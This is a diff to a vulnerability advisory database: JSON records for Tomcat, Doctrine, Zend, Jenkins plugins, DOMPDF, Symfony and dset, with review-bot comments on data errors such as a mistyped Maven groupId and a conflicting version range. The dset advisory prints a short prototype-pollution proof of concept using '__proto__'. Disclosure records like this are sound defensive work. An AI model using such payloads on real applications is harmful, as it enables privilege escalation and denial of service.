@@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvjh-7h8q-q56r", + "modified": "2024-02-07T23:37:52Z", + "published": "2022-05-14T02:42:23Z", + "aliases": [ + "CVE-2010-4312" + ], + "summary": "Apache Tomcat has cookies without HTTPOnly flag in Set-Cookie header", + "details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.35" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608286" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://launchpad.net/bugs/cve/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://ubuntu.com/security/CVE-2010-4312" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1004" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:37:52Z", + "nvd_published_at": "2010-11-26T20:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json b/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json index f47b3cc60d3a0..804e5c0d72cc4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json +++ b/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json 
@@ -34,25 +34,6 @@ } ] }, - { - "package": { - "ecosystem": "Packagist", - "name": "doctrine/cache" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.3.2" - } - ] - } - ] - }, { "package": { "ecosystem": "Packagist", @@ -120,10 +101,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "2.5.0" }, { - "fixed": "2.4.8" + "fixed": "2.5.1" } ] } @@ -132,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/orm" + "name": "doctrine/mongodb-odm" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "0" }, { - "fixed": "2.5.1" + "fixed": "1.0.2" } ] } @@ -151,7 +132,7 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/mongodb-odm" + "name": "doctrine/mongodb-odm-bundle" }, "ranges": [ { @@ -161,7 +142,7 @@ "introduced": "0" }, { - "fixed": "1.0.2" + "fixed": "3.0.1" } ] } @@ -170,17 +151,17 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/mongodb-odm-bundle" + "name": "zendframework/zendframework1" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.12.0" }, { - "fixed": "3.0.1" + "fixed": "1.12.16" } ] } @@ -189,17 +170,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zfcampus/zf-apigility-doctrine" + "name": "zendframework/zend-cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { - "fixed": "1.0.3" + "fixed": "2.5.3" } ] } @@ -215,7 +196,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0-stable" + "introduced": "3.0.0" }, { "fixed": "3.2.1" @@ -227,17 +208,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "doctrine/cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { - "fixed": "2.4.8" + "fixed": "1.3.2" } ] } 
@@ -246,17 +227,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework1" + "name": "zendframework/zend-cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.12.0" + "introduced": "2.4.0" }, { - "fixed": "1.12.16" + "fixed": "2.4.8" } ] } @@ -265,17 +246,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zend-cache" + "name": "zendframework/zendframework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "2.4.0" }, { - "fixed": "2.5.3" + "fixed": "2.4.8" } ] } @@ -284,17 +265,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zend-cache" + "name": "zfcampus/zf-apigility-doctrine" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { - "fixed": "2.4.8" + "fixed": "1.0.3" } ] } 
@@ -306,10 +287,50 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5723"
     },
+    {
+      "type": "WEB",
+      "url": "https://framework.zend.com/security/advisory/ZF2015-07"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/aws/aws-sdk-php/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/cache/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/orm/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-cache/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-5723.yaml"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zfcampus/zf-apigility-doctrine/CVE-2015-5723.yaml"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/aws/aws-sdk-php/releases/tag/3.2.1"
     },
+    {
+      "type": "WEB",
+      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2IUUC7HPN4XE5NNTG4MR76OC662XRZUO/"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HPS7A54FQ2CR6PH4NDR6UIYJIRNFXW67/"
+    },
     {
       "type": "WEB",
       "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IUUC7HPN4XE5NNTG4MR76OC662XRZUO/"
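Review bot: The two added Fedora announcement references spell the list address with `%40` and duplicate the existing entries that keep a literal `@` (one is the context line closing this hunk, the other the first context line of the next hunk); the added `https://framework.zend.com/security/advisory/ZF2015-07` likewise duplicates the existing `http://framework.zend.com/security/advisory/ZF2015-07` kept as context in the next hunk. Consumers dedupe references by exact URL, so each pair will render as two links to the same page. Keep one form per target: the literal-`@` Fedora URLs that already exist, and the `https` Zend URL in place of the `http` one.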
@@ -318,6 +339,10 @@
       "type": "WEB",
       "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HPS7A54FQ2CR6PH4NDR6UIYJIRNFXW67/"
     },
+    {
+      "type": "WEB",
+      "url": "https://www.doctrine-project.org/2015/08/31/security_misconfiguration_vulnerability_in_various_doctrine_projects.html"
+    },
     {
       "type": "WEB",
       "url": "http://framework.zend.com/security/advisory/ZF2015-07"
diff --git a/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json b/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json
new file mode 100644
index 0000000000000..b6562dfa1f738
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwvj-6phx-qv8c", + "modified": "2024-01-30T22:40:37Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000014" + ], + "summary": "CSRF vulnerability in Jenkins Translation Assistance plugin", + "details": "Jenkins Translation Assistance Plugin 1.15 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to override localized strings displayed to all users on the current Jenkins instance if the victim is a Jenkins administrator.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:translation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.15" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000014" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102809" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:40:37Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json b/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json new file mode 100644 index 0000000000000..a83008e13ad8c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px35-882c-47hw", + "modified": "2024-01-30T21:27:36Z", + "published": "2022-05-24T22:00:03Z", + "aliases": [ + "CVE-2019-10326" + ], + "summary": "Jenkins Warnings NG Plugin cross-site request forgery vulnerability", + "details": "A cross-site request forgery vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attackers to reset warning counts for future builds.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:warnings-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10326" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/warnings-ng-plugin/blob/main/CHANGELOG.md#510---2019-5-31" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1391" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:27:36Z", + "nvd_published_at": "2019-05-31T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json b/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json new file mode 100644 index 0000000000000..91333fb09ff45 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json 
@@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4xc-7cw8-cgfj", + "modified": "2024-02-01T21:04:19Z", + "published": "2022-05-24T17:37:26Z", + "aliases": [ + "CVE-2020-28277" + ], + "summary": "dset vulnerable to prototype pollution", + "details": "### Overview\nPrototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module 'dset' can be abused by Prototype Pollution vulnerability since the function ‘export ()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC\nThe export function accepts three arguments `obj, keys, val`. Due to the absence of validation, at values passed into `keys, val` arguments, an attacker can supply a malicious value by adjusting the `keys` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `keys` is the Object's own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. 
Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst dset = require('dset');\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\ndset(obj, '__proto__.polluted', true);\nconsole.log(\"After : \" + obj.polluted);\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "dset" + }, + "ecosystem_specific": { + "affected_functions": [ + "(dset)" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "2.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/commit/2b9ec49e231107b1a83b04a1bc1a66a8d14cea1c" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210104204657/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:04:19Z", + "nvd_published_at": "2020-12-29T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json b/advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json similarity index 75% rename from advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json rename to advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json index 50d757e1ccd33..239159eba4727 100644 
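Review bot: The dset range ends with `"fixed": "2.0.1"`, which marks 2.0.1 as not affected, while the summary and details in the same file say versions 1.0.0 through 2.0.1 are vulnerable; one of the two is wrong. The shvl advisory added in this same commit (GHSA-pqwc-3vhw-qcvq) models the analogous case as `"fixed": "2.0.2"` together with `"last_known_affected_version_range": "<= 2.0.1"`. If 2.0.1 is confirmed vulnerable, this range should take that shape; if the fix shipped in 2.0.1, the prose should say through 2.0.0 instead. Which applies has to be checked against the upstream release history rather than inferred from this hunk.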
--- a/advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json
+++ b/advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json
@@ -1,11 +1,12 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-q5wm-qgxj-h9ph",
-  "modified": "2022-05-13T01:15:05Z",
+  "modified": "2024-01-30T22:04:47Z",
   "published": "2022-05-13T01:15:05Z",
   "aliases": [
     "CVE-2019-10293"
   ],
+  "summary": "Missing permission check in Jenkins Kmap Plugin allow SSRF",
   "details": "A missing permission check in Jenkins Kmap Plugin in KmapJenkinsBuilder.DescriptorImpl form validation methods allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
   "severity": [
     {
@@ -14,7 +15,15 @@
     }
   ],
   "affected": [
-
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "rg.jenkins-ci.plugins:kmap-jenkins"
+      },
+      "versions": [
+        "1.6"
+      ]
+    }
   ],
   "references": [
     {
@@ -39,8 +48,8 @@
         "CWE-862"
       ],
       "severity": "MODERATE",
-      "github_reviewed": false,
-      "github_reviewed_at": null,
+      "github_reviewed": true,
+      "github_reviewed_at": "2024-01-30T22:04:26Z",
       "nvd_published_at": "2019-04-04T16:29:00Z"
     }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json b/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json
new file mode 100644
index 0000000000000..78aeb8e04050c
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json
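Review bot: The Maven coordinate added in the `@@ -14,7 +15,15 @@` hunk, `"name": "rg.jenkins-ci.plugins:kmap-jenkins"`, drops the leading `o` of the groupId; every other Jenkins plugin entry in this commit uses `org.jenkins-ci.plugins:...` (for example `org.jenkins-ci.plugins:translation` and `org.jenkins-ci.plugins:relution-publisher`). An advisory keyed to a groupId that does not exist matches no artifact, so dependency scanners consuming this database will silently never flag the plugin. The line should read `"name": "org.jenkins-ci.plugins:kmap-jenkins"`. Separately, `"versions": ["1.6"]` pins a single version with no range; that is only complete if 1.6 is the sole published release, which is worth confirming, otherwise a `ranges` entry with `last_affected` would match the other Jenkins entries here.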
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q83c-64c9-c42m",
+ "modified": "2024-02-01T21:16:49Z",
+ "published": "2022-05-17T19:57:15Z",
+ "aliases": [
+ "CVE-2014-5012"
+ ],
+ "summary": "DOMPDF denial of service vulnerability",
+ "details": "DOMPDF before 0.6.2 allows denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "dompdf/dompdf"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.6"
+ },
+ {
+ "fixed": "0.6.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5012"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5012.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dompdf/dompdf/releases/tag/v0.6.2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:16:49Z",
+ "nvd_published_at": "2020-01-10T06:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json b/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json
index c8263e12a38ca..185407e1adf05 100644
--- a/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json
+++ b/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q87v-q8fw-gmj5",
- "modified": "2023-10-31T19:57:43Z",
+ "modified": "2024-02-08T19:47:42Z",
 "published": "2022-05-24T16:46:23Z",
 "aliases": [
 "CVE-2017-11365"
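Review bot: `"introduced": "0.6"` narrows the affected range below what the `details` string states; `DOMPDF before 0.6.2` corresponds to `"introduced": "0"`, and the two-component form is also the only non-three-part version among this commit's Packagist entries. If the 0.6 floor is deliberate (no earlier release exists on Packagist, presumably), `details` should say so; otherwise use `"introduced": "0"`. The CVSS 3.1 vector on a 2014 CVE is presumably GitHub's own assessment rather than NVD's, which is fine but worth knowing when comparing with the `ADVISORY` reference. Every new file in this commit ends with `\ No newline at end of file`; a trailing newline keeps later diffs on the closing brace clean.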
@@ -15,6 +15,158 @@
 }
 ],
 "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.7.30"
+ },
+ {
+ "fixed": "2.7.32"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.23"
+ },
+ {
+ "fixed": "2.8.25"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.2.10"
+ },
+ {
+ "fixed": "3.2.12"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.3.3"
+ },
+ {
+ "fixed": "3.3.5"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.7.30"
+ },
+ {
+ "fixed": "2.7.32"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.23"
+ },
+ {
+ "fixed": "2.8.25"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.2.10"
+ },
+ {
+ "fixed": "3.2.12"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.3.3"
+ },
+ {
+ "fixed": "3.3.5"
+ }
+ ]
+ }
+ ]
+ },
 {
 "package": {
 "ecosystem": "Packagist",
@@ -25,7 +177,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "2.7.0"
+ "introduced": "2.7.30"
 },
 {
 "fixed": "2.7.32"
@@ -44,7 +196,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "2.8.0"
+ "introduced": "2.8.23"
 },
 {
 "fixed": "2.8.25"
@@ -63,7 +215,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "3.2.0"
+ "introduced": "3.2.10"
 },
 {
 "fixed": "3.2.12"
@@ -82,7 +234,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "3.3.0"
+ "introduced": "3.3.3"
 },
 {
 "fixed": "3.3.5"
@@ -105,6 +257,18 @@
 "type": "WEB",
 "url": "https://github.com/symfony/symfony/commit/878198cefae028386c6dc800ccbf18f2b9cbff3f"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2017-11365.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-11365.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-11365.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/symfony/symfony"
@@ -112,6 +276,10 @@
 {
 "type": "WEB",
 "url": "https://symfony.com/blog/cve-2017-11365-empty-passwords-validation-issue"
+ },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/cve-2017-11365"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json b/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json
index 6beb6e9bc7e06..46dc403540304 100644
--- a/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json
+++ b/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json
@@ -90,6 +90,82 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.0.0"
+ },
+ {
+ "fixed": "2.0.24"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.1.0"
+ },
+ {
+ "fixed": "2.1.12"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.2.0"
+ },
+ {
+ "fixed": "2.2.5"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.3.0"
+ },
+ {
+ "fixed": "2.3.3"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -105,10 +181,22 @@
 "type": "WEB",
 "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86364"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-4751.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/validator/CVE-2013-4751.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/symfony/validator"
 },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/blog/security-releases-symfony-2-0-24-2-1-12-2-2-5-and-2-3-3-released"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20200228181137/http://www.securityfocus.com/bid/61709"
diff --git a/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json b/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json
new file mode 100644
index 0000000000000..b98284cedddf5
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qc3m-6xmq-7hrj",
+ "modified": "2024-01-30T22:24:20Z",
+ "published": "2022-05-13T01:31:33Z",
+ "aliases": [
+ "CVE-2019-10289"
+ ],
+ "summary": "CSRF vulnerability in Jenkins Netsparker Enterprise Scan Plugin",
+ "details": "A cross-site request forgery vulnerability in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers to initiate a connection to an attacker-specified server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:netsparker-cloud-scan"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.1.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10289"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032"
+ },
+ {
